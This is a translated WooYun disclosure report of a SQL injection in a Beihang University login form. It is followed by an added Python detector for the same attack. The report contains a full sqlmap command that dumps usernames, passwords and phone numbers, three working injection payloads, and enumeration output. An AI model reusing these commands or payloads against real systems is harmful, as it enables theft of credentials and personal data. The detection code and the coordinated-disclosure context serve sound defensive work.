
Vulnerability summary

Defect ID: wooyun-2015-0151770

Title: A site of Beihang University (Beijing University of Aeronautics and Astronautics) has a POST-type SQL injection vulnerability (passwords and phone numbers of admin and other users leaked)

Vendor: 北京航空航天大学 (Beihang University)

Author: 路人甲

Submitted: 2015-11-04 15:46

Fixed: 2015-12-21 15:18

Published: 2015-12-21 15:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]


Vulnerability details

Disclosure status:

2015-11-04: Details sent to the vendor, awaiting vendor handling
2015-11-06: Vendor confirmed; details disclosed to the vendor only
2015-11-16: Details disclosed to core white hats and domain experts
2015-11-26: Details disclosed to regular white hats
2015-12-06: Details disclosed to intern white hats
2015-12-21: Details disclosed to the public

Brief description:

Beihang University (Beijing University of Aeronautics and Astronautics) was founded in 1952 by merging the aeronautics departments of eight institutions, including Tsinghua University, Peiyang University, Xiamen University and Sichuan University. It was the first aerospace university of the People's Republic of China and is now administered by the Ministry of Industry and Information Technology. The university has two campuses, Xueyuan Road and Shahe, covering 3,000 mu with more than 1.5 million square meters of floor space. Since its founding Beihang has been a key national university: one of the first 16 key universities nationwide, one of the first 22 universities to establish a graduate school after the degree system was restored in the 1980s, among the first admitted to Project 211, and admitted to Project 985 in 2001. After sixty years of development it has formed the core strengths of a research university, markedly raised its internal cohesion and its domestic and international influence, and joined the first tier of China's high-level universities.

Detailed description:

Address: http://**.**.**.**/student/my/login

python sqlmap.py -u "http://**.**.**.**/student/my/login" --form -p LoginForm[username] --technique=BEU --random-agent --batch -D inspection -T in_user -C user_name,user_id,user_pwd,user_phone,user_qq,user_email,user_nkname --dump

Proof of vulnerability:

---
Parameter: LoginForm[username] (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
Type: UNION query
Title: MySQL UNION query (NULL) - 63 columns
Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
current user: 'inspection@localhost'
current user is DBA: False
database management system users [1]:
[*] 'inspection'@'localhost'
available databases [2]:
[*] information_schema
[*] inspection
Database: inspection
[37 tables]
+---------------------------+
| YiiSession |
| in_application |
| in_arrange |
| in_arrangebak |
| in_assignxy |
| in_attendance |
| in_authassignment |
| in_authitem |
| in_authitemchild |
| in_config |
| in_course |
| in_courseallocation |
| in_courseallocationbak |
| in_coursebak |
| in_delayed |
| in_emapp |
| in_examinationarrangement |
| in_exemption |
| in_files |
| in_information |
| in_lookup |
| in_organization |
| in_otinfo |
| in_pici |
| in_precord |
| in_professional |
| in_professionalbak |
| in_province |
| in_review |
| in_scrollpicture |
| in_setconfig |
| in_sjpici |
| in_students |
| in_students_manage |
| in_teacher |
| in_user |
| in_vestigate |
+---------------------------+
Database: inspection
Table: in_user
[27 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| user_adderss | varchar(100) |
| user_authorize | varchar(500) |
| user_bddm | varchar(100) |
| user_email | varchar(30) |
| user_headimg | varchar(100) |
| user_id | int(11) unsigned |
| user_iparr | varchar(3000) |
| user_isdel | int(11) |
| user_lastip | varchar(50) |
| user_lasttime | int(11) |
| user_loginnum | int(11) |
| user_msn | varchar(100) |
| user_name | varchar(30) |
| user_nkname | varchar(100) |
| user_online | int(11) |
| user_organization | int(11) |
| user_phone | varchar(50) |
| user_pwd | varchar(50) |
| user_qq | varchar(50) |
| user_regtime | int(11) |
| user_role | int(11) |
| user_rolebz | varchar(100) |
| user_sfqz | varchar(100) |
| user_status | int(11) |
| user_tel | varchar(50) |
| user_tel2 | varchar(50) |
| user_webset | varchar(100) |
+-------------------+------------------+
Database: inspection
Table: in_user
[37 entries]

Fix recommendation:

Add input filtering.

Copyright notice: please credit 路人甲@乌云 when reposting.
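The report's fix is a one-liner, so here is a detection-side companion, added here and not part of the original report or the site's code: a small classifier that inspects a url-encoded login POST body and flags the three sqlmap techniques the proof above shows (RLIKE boolean-blind, FLOOR(RAND(0)*2) error-based, and the 63-column UNION NULL probe). The field name LoginForm[username] comes from the report; the sample bodies are constructed from its payloads, and the signature names and shortened hex strings are my own.

```python
import re
from urllib.parse import parse_qs

# Signatures for the three sqlmap techniques in this report, applied to the
# decoded LoginForm[username] value after upper-casing and whitespace collapse.
SIGNATURES = {
    # ') RLIKE (SELECT (CASE WHEN (n=n) THEN ... ELSE ... END)) AND ('x'='x
    "boolean-blind-rlike": re.compile(r"\bRLIKE\s*\(\s*SELECT\b.*\bCASE WHEN\b"),
    # (SELECT COUNT(*),CONCAT(...,FLOOR(RAND(0)*2))x FROM ... GROUP BY x)
    "error-based-floor-rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(0\)\s*\*\s*2\s*\).*\bGROUP BY\b"),
    # UNION ALL SELECT CONCAT(0x..,..),NULL,NULL,... (column-count probe)
    "union-null-columns": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b.*(?:,\s*NULL){5,}"),
}
# The quote-plus-parenthesis break-out that all three payloads share: ') AND / ') UNION ...
BREAKOUT = re.compile(r"['\"]\s*\)\s*(?:AND|OR|RLIKE|UNION)\b")

def normalize(value: str) -> str:
    """Collapse whitespace and upper-case so spacing and case tricks do not evade the regexes."""
    return re.sub(r"\s+", " ", value).strip().upper()

def classify_login_body(body: str, field: str = "LoginForm[username]") -> list:
    """Return the signature names matched by one urlencoded POST body ([] when clean).

    `body` is the raw application/x-www-form-urlencoded request body, as a reverse
    proxy, WAF or access-log pipeline would see it; values are percent-decoded here.
    """
    params = parse_qs(body, keep_blank_values=True)
    hits = []
    for raw in params.get(field, []):
        value = normalize(raw)
        if BREAKOUT.search(value):
            hits.append("quote-paren-breakout")
        hits.extend(name for name, rx in SIGNATURES.items() if rx.search(value))
    return hits

# Constructed sample bodies: three rebuilt from the report's payloads, one benign login.
TAIL = "&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB%E5%BD%95"
SAMPLE_BODIES = {
    "boolean": "LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a "
               "ELSE 0x28 END)) AND ('SBlj'='SBlj" + TAIL,
    "error": "LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,"
             "(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM "
             "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa" + TAIL,
    "union": "LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x53,0x7171786a71),"
             + ",".join(["NULL"] * 62) + "#" + TAIL,
    "benign": "LoginForm[username]=zhangsan&LoginForm[password]=s3cret!&LoginForm[verifyCode]=asGb",
}

def scan_samples() -> dict:
    """Classify every constructed sample body; used by the demo below and by tests."""
    return {name: classify_login_body(body) for name, body in SAMPLE_BODIES.items()}

if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:8s} -> {hits or 'clean'}")
```

Signatures like these catch the default sqlmap probes but not a hand-tuned payload; the durable fix on the application side remains binding the username as a query parameter instead of concatenating it into the SQL string.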


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-06 15:17

Vendor reply:

CNVD confirmed the described issue; it has been forwarded through CNCERT to 赛尔教育 (CERNET Education), which will coordinate handling with the unit that administers the site.

Latest status:

None yet